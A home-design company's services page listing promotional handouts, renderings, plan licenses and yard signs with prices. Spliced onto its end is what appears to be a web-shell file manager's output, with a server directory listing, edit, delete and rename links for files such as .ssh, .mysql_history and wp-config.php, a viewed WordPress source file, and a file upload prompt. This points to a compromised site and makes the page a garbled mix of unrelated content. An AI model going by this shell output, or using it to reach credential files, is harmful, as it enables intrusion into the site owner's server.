Services We Offer

build-footer

Customized Promotional Handout

$85.00

Perfect for use as a tear sheet in your sales packet or as a handout in your model home, sales office, home shows, or special events. The customized promotional handout is for trade professionals that wish to legally advertise or showcase this design before (or after) purchasing the construction drawings and building the home.
This handout is provided electronically. Digital artwork* is hi-resolution, suitable for printing, and can be downsized for use on your website by your website administrator. Printed actual size is 8.5” x 11”. With this purchase, you will also receive the individual digital images for use on your web site, print media, and MLS.

*If you join our Builder-Centric℠ Preferred Builder Program, you will receive your floor plan artwork in color (sample at right) at no extra charge!

build-footer

Customized Home Renderings

Contact for price

Design Basics wants to help you build the home of your dreams. That’s why we offer custom 3D elevation renderings to help our customers visualize how a home will look once it’s built. Our team will work closely alongside you to help you choose the features of your rendering and create an image for you to see your home’s style and curb appeal!

build-footer

Plan Promotional License

$25

Copyright Protection for Advertising Purposes

Prior to purchasing a home plan license, you may want to advertise that design on your website, in your MLS, or in any print or electronic media. However, due to copyright law you cannot legally use any image, from any source, of a home design offered by Designs Basics without a Promotional
License.
You will receive via email the Promotional License and digital artwork* for the front elevation and each level of the home plan. The digital artwork is hi-resolution, suitable for printing, and can be downsized for use on your website by your website administrator.
To learn more about Plan Promotional Licenses and copyright protections, click here.

build-footer

Project Yard Signs

  • 44″W x 34″H or 34″W x 44″H Pricing and Format Options:
    • Digital File, ordered with the plan license = $250.00
    • Digital File, ordered separately/without the plan license (includes Promotional License) = $300.00
  • Typical production time is 8-10 business days.
build-footer

Promotional Bundle Packages

  • Yard Sign & Color Promo Artwork Bundle purchased with the plan license = $270.00 ($65.00 savings)
  • Yard Sign & Color Promo Artwork Bundle purchased separately/not with the plan license = $345.00 ($40.00 savings)

Typical production time is 8-10 business days.
Contact us to place your Promotional Marketing Materials order: 800.947.7526

Contact us for more information: 1.800.947.7526 or info@designbasics.com.

Current Dir: /var/www/designbasics/

[DIR]  .cache [ delete | rename ]
[DIR]  .local [ delete | rename ]
[FILE] .mysql_history [ edit | delete | rename ]
[DIR]  .ssh [ delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Viewing: /var/www/designbasics/wp-links-opml.php

<?php
/**
 * Outputs the OPML XML format for getting the links defined in the link
 * administration. This can be used to export links from one blog over to
 * another. Links aren't exported by the WordPress export, so this file handles
 * that.
 *
 * This file is not added by default to WordPress theme pages when outputting
 * feed links. It will have to be added manually for browsers and users to pick
 * up that this file exists.
 *
 * @package WordPress
 */

require_once __DIR__ . '/wp-load.php';

header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
$link_cat = '';
if ( ! empty( $_GET['link_cat'] ) ) {
	$link_cat = $_GET['link_cat'];
	if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) {
		$link_cat = absint( (string) urldecode( $link_cat ) );
	}
}

echo '<?xml version="1.0"?' . ">\n";
?>
<opml version="1.0">
	<head>
		<title>
		<?php
			/* translators: %s: Site title. */
			printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) );
		?>
		</title>
		<dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated>
		<?php
		/**
		 * Fires in the OPML header.
		 *
		 * @since 3.0.0
		 */
		do_action( 'opml_head' );
		?>
	</head>
	<body>
<?php
if ( empty( $link_cat ) ) {
	$cats = get_categories(
		array(
			'taxonomy'     => 'link_category',
			'hierarchical' => 0,
		)
	);
} else {
	$cats = get_categories(
		array(
			'taxonomy'     => 'link_category',
			'hierarchical' => 0,
			'include'      => $link_cat,
		)
	);
}

foreach ( (array) $cats as $cat ) :
	/** This filter is documented in wp-includes/bookmark-template.php */
	$catname = apply_filters( 'link_category', $cat->name );

	?>
<outline type="category" title="<?php echo esc_attr( $catname ); ?>">
	<?php
	$bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) );
	foreach ( (array) $bookmarks as $bookmark ) :
		/**
		 * Filters the OPML outline link title text.
		 *
		 * @since 2.2.0
		 *
		 * @param string $title The OPML outline title text.
		 */
		$title = apply_filters( 'link_title', $bookmark->link_name );
		?>
<outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated="
							<?php
							if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) {
								echo $bookmark->link_updated;
							}
							?>
" />
		<?php
	endforeach; // $bookmarks
	?>
</outline>
	<?php
endforeach; // $cats
?>
</body>
</opml>

Upload File: